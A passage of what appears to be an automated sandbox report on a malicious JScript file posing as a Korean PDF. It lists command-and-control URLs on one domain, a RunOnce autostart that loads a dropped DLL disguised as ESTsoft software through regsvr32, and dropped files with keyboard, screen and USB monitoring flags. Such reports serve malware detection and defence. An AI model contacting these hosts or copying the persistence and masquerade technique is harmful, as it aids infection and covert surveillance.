          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Tregsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69iregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190O$regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=c&p1=8ace11902M)regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=c&p1=8ace1190b7regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190wPregsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69kregsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190fbregsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190#~regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69eregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190O-regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=c&p1=8ace1190bKregsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190FNregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190v~regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190gMregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69zregsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=d&p1=8ace1190Mtregsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69qregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69oregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
            unknown
            http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69nregsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69uregsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmptrue
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190_Mregsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190Etregsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Fregsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190%regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190&regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace11906Lregsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190=tregsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190lN/regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace11905tregsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190&Mregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190?Lregsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190b$(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190csiregsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190qBregsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cfregsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190Iregsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190KP7regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190Jregsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190Kregsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190mCregsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLbregsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190sMhregsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190Bregsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190K8(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190LMregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace1190?regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190dbregsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190lO)regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190vregsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190yregsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190xregsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace11906regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190zregsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190pLkregsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190oregsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=c&p1=8ace11902regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190nregsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190qregsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190pregsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBmregsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://texts.letterpaper.press//?m=d&p1=8ace1190bt75regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              50.17.5.224
              texts.letterpaper.pressUnited States
              14618AMAZON-AESUStrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:1558048
              Start date:25.08.2021
              Start time:10:56:19
              Joe Sandbox Product:Cloud
              Overall analysis duration:0h 14m 52s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
              Number of analysed new started processes analysed:41
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winJSE@49/82@1/1
              EGA Information:
              • Successful, ratio: 25%
              HDC Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .jse
              • Override analysis time to 240s for JS/VBS files not yet terminated
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.211.4.250, 80.67.82.80, 80.67.82.97, 173.222.108.210, 173.222.108.226, 23.211.4.86
              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, a122.dscd.akamai.net, audownload.windowsupdate.nsatc.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 304 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 4168 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
              • Report size getting too big, too many NtWriteFile calls found.

              Signature Similarity

              Sample Distance (10 = nearest)
              10 9 8 7 6 5 4 3 2 1
              Samplename Analysis ID SHA256 Similarity

              Simulations

              Behavior and APIs

              TimeTypeDescription
              10:58:41API Interceptor26x Sleep call for process: RdrCEF.exe modified
              10:58:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate regsvr32.exe /s "C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll"
              10:59:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate regsvr32.exe /s "C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll"
              10:59:05API Interceptor52x Sleep call for process: powershell.exe modified
              10:59:22API Interceptor890x Sleep call for process: regsvr32.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              50.17.5.2240D940AB1CBEA49E99693A0DDA4225D2316CDE9C38BD59.exeGet hashmaliciousBrowse
              • umbrelladownload.uno:40355/
              UKKDVVgdOm.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              pc_setup_x86_x64_install.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              pc_setup_x86_x64_install.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              setup_x86_x64_install.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              setup_x86_x64_install.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              0fyvsE9LDC.exeGet hashmaliciousBrowse
              • mahetechasia.com/data/five/fre.php
              D99RHSOc04.exeGet hashmaliciousBrowse
              • mahetechasia.com/data/five/fre.php
              QYPe9LqvgN.exeGet hashmaliciousBrowse
              • mahetechasia.com/data/five/fre.php
              c679be2f_by_Libranalysis.exeGet hashmaliciousBrowse
              • www.cncode.pw/
              1905.xlsGet hashmaliciousBrowse
              • revolet-sa.com/files/countryyelow.php
              1905.xlsGet hashmaliciousBrowse
              • revolet-sa.com/files/countryyelow.php
              422d646c28b4fda4b6291e868342895495b714cba7638.exeGet hashmaliciousBrowse
              • 0x21.in:8000/_az/
              inv_397145572_1781481758.xlsGet hashmaliciousBrowse
              • revolet-sa.com/files/countryyelow.php
              inv_397145572_1781481758.xlsGet hashmaliciousBrowse
              • revolet-sa.com/files/countryyelow.php
              EUR 11,464.00 955PLA3210970613.PDF.exeGet hashmaliciousBrowse
              • alfawood.us/mkdgs/index.php

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              AMAZON-AESUSS6DNzkh376Get hashmaliciousBrowse
              • 44.200.82.219
              zoom.exeGet hashmaliciousBrowse
              • 52.202.62.250
              E38HvGUw3WGet hashmaliciousBrowse
              • 54.42.39.52
              https://ringernewunreadmsgscentral.weebly.com/Get hashmaliciousBrowse
              • 52.55.193.46
              zEQyeKgNgG.exeGet hashmaliciousBrowse
              • 54.208.186.182
              0824_7552110168.docGet hashmaliciousBrowse
              • 23.23.109.56
              0824_0646880414.docGet hashmaliciousBrowse
              • 54.235.91.189
              0824_0853746034.docGet hashmaliciousBrowse
              • 50.16.204.235
              0H2Z13Af7G.exeGet hashmaliciousBrowse
              • 54.83.52.76
              QUqBgpQj3BGet hashmaliciousBrowse
              • 54.45.200.219
              c0r0n4x.x86Get hashmaliciousBrowse
              • 54.20.32.213
              tiS0LFl5Cd.exeGet hashmaliciousBrowse
              • 208.80.202.60
              n038rUglDh.exeGet hashmaliciousBrowse
              • 34.225.62.6
              VXS0UU2rgK.exeGet hashmaliciousBrowse
              • 34.225.62.6
              jjy.dllGet hashmaliciousBrowse
              • 50.16.246.238
              hhdA1DwNsD.exeGet hashmaliciousBrowse
              • 54.235.247.117
              SKMBT 23082021 Ref MT103.exeGet hashmaliciousBrowse
              • 3.223.115.185
              loligang.armGet hashmaliciousBrowse
              • 54.63.121.139
              Proforma invoiceShipping documents.exeGet hashmaliciousBrowse
              • 35.153.154.128
              BXsIdfBOkgGet hashmaliciousBrowse
              • 54.52.58.93

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\ 2021-05-07.pdf
              Process:C:\Windows\System32\wscript.exe
              File Type:PDF document, version 1.4
              Category:dropped
              Size (bytes):21214792
              Entropy (8bit):7.953095259176038
              Encrypted:false
              SSDEEP:393216:qbyn6kZB5O7KbPSkc4a3r261YNaOo4D6vTu6bco6gcPvut:qbj2Y78PSX4aF1srocOTjwgcP2t
              MD5:ECA5B2616AEA464E9B623A91AED3B691
              SHA1:64D8E9C11253FA177FC45E439531C53C6830FC3C
              SHA-256:3251C02FF0FC90DCCD79B94FB2064FB3D7F870C69192AC1F10AD136A43C1CCEA
              SHA-512:E92E5013D43F4688DD61529A2E6D803A6FFF7036E9CE68AA9137730A2C32FC9A84A6901F4C4DA19A06985804DADB6320DECFF6B43EA8DE600AB41AF345542473
              Malicious:false
              Preview: %PDF-1.4.%..1 0 obj<</Pages 85 0 R /Outlines 17 0 R /Type /Catalog>>.endobj.2 0 obj.<</Type/Font /Subtype/Type0 /BaseFont/.....,Bold /Encoding /KSC-EUC-H /DescendantFonts[3 0 R]>>endobj.3 0 obj.<</Type /CIDFont /Subtype /CIDFontType0 /BaseFont /.....,Bold /CIDSystemInfo << /Registry(Adobe) /Ordering(Korea1) /Supplement 0>> /FontDescriptor 4 0 R /DW 500 /W [ 100 8000 1000 ] .>>.endobj.4 0 obj.<</Type /FontDescriptor /FontName /.....,Bold /Flags 32 /FontBBox[0 -154 1000 862]/ItalicAngle 0 /Ascent 858 /Descent 141 /CapHeight 861 /StemV 80.>>.endobj.5 0 obj.<</Type/Font /Subtype/Type0 /BaseFont/..... /Encoding /KSC-EUC-H /DescendantFonts[6 0 R]>>endobj.6 0 obj.<</Type /CIDFont /Subtype /CIDFontType0 /BaseFont /..... /CIDSystemInfo << /Registry(Adobe) /Ordering(Korea1) /Supplement 0>> /FontDescriptor 7 0 R /DW 500 /W [ 100 8000 1000 ] .>>.endobj.7 0 obj.<</Type /FontDescriptor /FontName /..... /Flags 32 /FontBBox[0 -154 1000 862]/ItalicAngle 0 /Ascent 858 /Descent 141 /CapHeight 86
              C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):194560
              Entropy (8bit):7.923746161712757
              Encrypted:false
              SSDEEP:3072:skV6k74dhL0o0oqRT3vnkyVFTUwpsP+wqnsWtIN0KZehS5kxXhJhzYs/Hy9ehqk2:JR8rL0nn3vkyVFoVQZKZew5uXhJ+gy02
              MD5:14E01ED4D086206D3C4B7159DC887F25
              SHA1:2918B5AF300E979593DF44696E947DA396018532
              SHA-256:0A4F2CFF4D4613C08B39C9F18253AF0FD356697368EECDDF7C0FA560386377E6
              SHA-512:ED9A19513F27D40620C38EA9A18CAE3A8B806CDD6ACFA44D9FFF58FAEFD23D2D085E382B10412A01F6672304CBFB3D01AEDAFCF8DE7AB41E3CAFFDF069BD88E6
              Malicious:true
              Antivirus:
              • Antivirus: Metadefender, Detection: 32%, Browse
              • Antivirus: ReversingLabs, Detection: 68%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@...A...@...A+..@...A...@...@...@..8@...@U..A...@U..A...@...A...@U..A..@...A..@...A...@...@...@...A...@Rich...@................PE..d....H.`.........." ................0.....................................................`..................................................................p...)......................................................0...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................3.96.UPX!.$..
              C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.enc
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):154
              Entropy (8bit):6.67575050167768
              Encrypted:false
              SSDEEP:3:3lpBZiw/K9VgCMkitRJtkTdi7O4S5DiZtWgIp0sOC5sDIikXIAXhkk7:fz/YWt+iZS5Di3pIp0RCyD+hkk7
              MD5:98FC22F75BFE0B34F8347C82CB2F53BE
              SHA1:284BBCCF3AE04F1F7DCBD4AA3F6519E8BB8554C2
              SHA-256:F6F0B936933E69159CC3302FB9574554FF30894F3DC2FAC3A906A4EC226451BC
              SHA-512:E219F28F21CE7FCA13823BF6DE6A7D2B4B631C793446C95ACD029BDEFD5323AB18024D2E4F7BFCEE57F39D627E94EA89123BAE0EA6515C6FCCA9CEBBF9F6E8DD
              Malicious:false
              Preview: ......LRk.K3=f(...?.x...d$l....\..P..6..?.....r.+..T......_........t.5."x_.f..k..06.:^...!K._.....E..L{.S.X.f7...7.4.&3.......$K=.(.C.......f..)..;A
              C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PDF document, version 1.7
              Category:dropped
              Size (bytes):195
              Entropy (8bit):6.83803150109145
              Encrypted:false
              SSDEEP:3:Im7ml+/18LpJosoz8PCb6DEPAgI1B/zjZph8T8K+T2FW6PZ7G4uA1IUNgmpQaIvt:Iv+Up7oQLEnIJhExi+PZ7GSWspQFl5
              MD5:7DE2BF516E56542138ECCFEC08820070
              SHA1:12147AA70BA6B1D3B00C3AC8D11FC6FDD4ED69EB
              SHA-256:DC77A01DF0202C2872ED8DE3A13A071784D0172AF25CF2FB7170462027E48EA5
              SHA-512:252A1538D9E7F7C6D7D4B365262448BC543CE20CB4A569A67B9D38F58210D0509241DDB54FBAC988B3929A0B9680155069B7F36530BA9BF81867D35EB157C6E3
              Malicious:false
              Preview: %PDF-1.7..4 0 obj....$.....y.o&~2L..2.....5...mM.*/2.t..g=.>.KJc!..<x<e...O'3P......ZuK...Vm.!'...e.kPL...y.TZ...9x./....p.....33..2<^B#].a._wB.P...x...M.\.m.~..T..L,....'-).R.......6g
              C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.zip
              Process:C:\Windows\System32\regsvr32.exe
              File Type:Zip archive data (empty)
              Category:dropped
              Size (bytes):22
              Entropy (8bit):1.0476747992754052
              Encrypted:false
              SSDEEP:3:pjt/l:Nt
              MD5:76CDB2BAD9582D23C1F6F4D868218D6C
              SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
              SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
              SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
              Malicious:false
              Preview: PK....................
              C:\ProgramData\Software\ESTsoft\Common\flags\FolderMonitor
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):2.0
              Encrypted:false
              SSDEEP:3:b:b
              MD5:D7A7B80A25465364FE8715DD5AA607B6
              SHA1:1547D32448BC572A3BA92D824F60BCE446C923C1
              SHA-256:E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
              SHA-512:D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
              Malicious:false
              Preview: f.l.a.g.
              C:\ProgramData\Software\ESTsoft\Common\flags\KeyboardMonitor
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):2.0
              Encrypted:false
              SSDEEP:3:b:b
              MD5:D7A7B80A25465364FE8715DD5AA607B6
              SHA1:1547D32448BC572A3BA92D824F60BCE446C923C1
              SHA-256:E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
              SHA-512:D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
              Malicious:false
              Preview: f.l.a.g.
              C:\ProgramData\Software\ESTsoft\Common\flags\ScreenMonitor
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):2.0
              Encrypted:false
              SSDEEP:3:b:b
              MD5:D7A7B80A25465364FE8715DD5AA607B6
              SHA1:1547D32448BC572A3BA92D824F60BCE446C923C1
              SHA-256:E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
              SHA-512:D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
              Malicious:false
              Preview: f.l.a.g.
              C:\ProgramData\Software\ESTsoft\Common\flags\UsbMonitor
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):2.0
              Encrypted:false
              SSDEEP:3:b:b
              MD5:D7A7B80A25465364FE8715DD5AA607B6
              SHA1:1547D32448BC572A3BA92D824F60BCE446C923C1
              SHA-256:E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
              SHA-512:D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
              Malicious:false
              Preview: f.l.a.g.
              C:\ProgramData\Software\ESTsoft\Common\list.fdb
              Process:C:\Windows\System32\regsvr32.exe
              File Type:AIX core file 64-bit
              Category:dropped
              Size (bytes):586
              Entropy (8bit):1.0
              Encrypted:false
              SSDEEP:3:Qjj:Qjj
              MD5:F359D5F994F5D0B9CFC1713B56B02711
              SHA1:8AEFCB99CBC6F32562CA3689A104B3B5B66D279C
